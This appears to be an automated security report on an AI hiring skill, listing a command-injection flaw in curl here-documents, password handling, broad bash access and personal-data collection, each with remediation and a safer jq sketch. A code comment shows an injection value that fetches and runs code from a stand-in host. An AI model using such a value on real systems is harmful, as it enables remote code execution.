Trust Assessment
blossom-hire received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 1 high, 1 medium, and 1 informational. Key findings include Command Injection via Unsanitized Shell Variables in `curl` Payload, Direct Handling and Transmission of `passKey`, and Broad `bash` and `jq` Tool Access.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Command Injection via Unsanitized Shell Variables in `curl` Payload.** The 'Commit role' and 'Retrieve candidates' bash examples use unquoted here-documents (`<<JSON`) for `curl` payloads, allowing shell variable expansion. Variables such as `PERSON_ID`, `SESSION_KEY`, `ADDRESS_ID`, and `NOW_MILLIS` are interpolated directly into the JSON. If their values (which originate from the LLM's state or user input) contain shell metacharacters such as `$(command)`, the shell executes them before the `curl` command runs, leading to arbitrary command execution. *Remediation:* Use a quoted here-document (`<<'JSON'`) so the shell performs no expansion inside the payload, and instruct the LLM to substitute properly JSON-escaped values directly into the string. If shell variables must be used, quote them within the JSON (e.g., `"\"${SESSION_KEY}\""`) and sanitize inputs to strip shell metacharacters. Best practice is to avoid shell variable expansion entirely for data that belongs in the JSON payload. | LLM | SKILL.md:248 |
| HIGH | **Direct Handling and Transmission of `passKey`.** The skill explicitly instructs the LLM to collect a `passKey` (password) from the user and transmit it directly in the JSON body for both registration and login. The `passKey` is therefore exposed in the LLM's conversational context, potentially in logs, and handled in plain text (HTTPS protects transit, but the LLM's internal handling remains the concern). No secure input method (e.g., masked input) or ephemeral-storage guidance is given, increasing the risk of exposure. *Remediation:* 1. **Avoid direct `passKey` handling:** if possible, use a more secure authentication flow (e.g., OAuth or token exchange) that does not require the LLM to handle user passwords. 2. **Masked input:** if the `passKey` is unavoidable, use masked input where the platform supports it and discard the value from context immediately after use. 3. **Ephemeral storage:** hold the `passKey` only for the duration of the API call; never store or log it. | LLM | SKILL.md:100 |
| MEDIUM | **Broad `bash` and `jq` Tool Access.** The skill explicitly requires `bash` and `jq` tool access. `bash` provides wide-ranging capabilities, including filesystem access, network operations, and arbitrary command execution. While necessary for the skill's functionality (making `curl` calls), broad access without sandboxing or restrictions amplifies the impact of other vulnerabilities, such as command injection. *Remediation:* 1. **Least privilege:** if the platform allows, restrict `bash` execution to only the `curl` and `jq` commands needed, or provide a more constrained execution environment. 2. **Input sanitization:** sanitize all data passed to `bash` commands to mitigate command injection. 3. **Alternative execution:** if possible, use a more structured, less flexible method for HTTP requests than raw `bash` and `curl` (e.g., a dedicated HTTP client library if the platform supports one). | LLM | SKILL.md:44 |
| INFO | **Handling of Personally Identifiable Information (PII).** The skill is designed to collect and transmit significant PII, including email, full name, mobile number, address details, and a `passKey`, to the `hello.blossomai.org` API. While this is the intended functionality, it highlights the sensitive nature of the data being processed: any compromise of the `blossomai.org` endpoint or the skill's execution environment could expose this PII. *Remediation:* 1. **Privacy policy:** ensure users know what data is collected, why, and where it is sent, ideally linking to a privacy policy for `blossomai.org`. 2. **Data minimization:** collect only the minimum data required for the task. 3. **Secure transmission and storage:** reiterate the importance of HTTPS transport (which `curl` uses) and secure storage practices by the backend service. | LLM | SKILL.md:88 |
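The critical and medium findings above share one remediation: keep untrusted values out of shell expansion when building the `curl` payload. A minimal sketch follows; the variable names mirror those in the finding, but the payload shape and test values are illustrative and not taken from SKILL.md:

```shell
#!/bin/sh
# Unsafe pattern flagged above: an unquoted here-document expands
# variables AND $(command) substitutions before curl ever runs:
#
#   curl ... --data-binary @- <<JSON
#   { "sessionKey": "$SESSION_KEY" }
#   JSON
#
# A value like '$(curl evil.example | sh)' would execute in the shell.

# Safer sketch: let jq build the payload. --arg passes each value
# out-of-band, so it is JSON-escaped and never subject to shell expansion.
SESSION_KEY='abc"123$(echo pwned)'   # deliberately hostile test value
PERSON_ID='42'

payload=$(jq -cn \
  --arg sessionKey "$SESSION_KEY" \
  --arg personId "$PERSON_ID" \
  '{sessionKey: $sessionKey, personId: $personId}')

# The $(echo pwned) survives as literal text and the embedded quote
# is escaped; nothing was executed.
echo "$payload"
```

A quoted here-document (`<<'JSON'`) gives the same non-expansion guarantee, but the values must then be escaped by hand; `jq --arg` handles escaping automatically, which also answers the MEDIUM finding's call for more structured request construction.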
[Full report](https://skillshield.io/report/b2394ca447ca8d7a)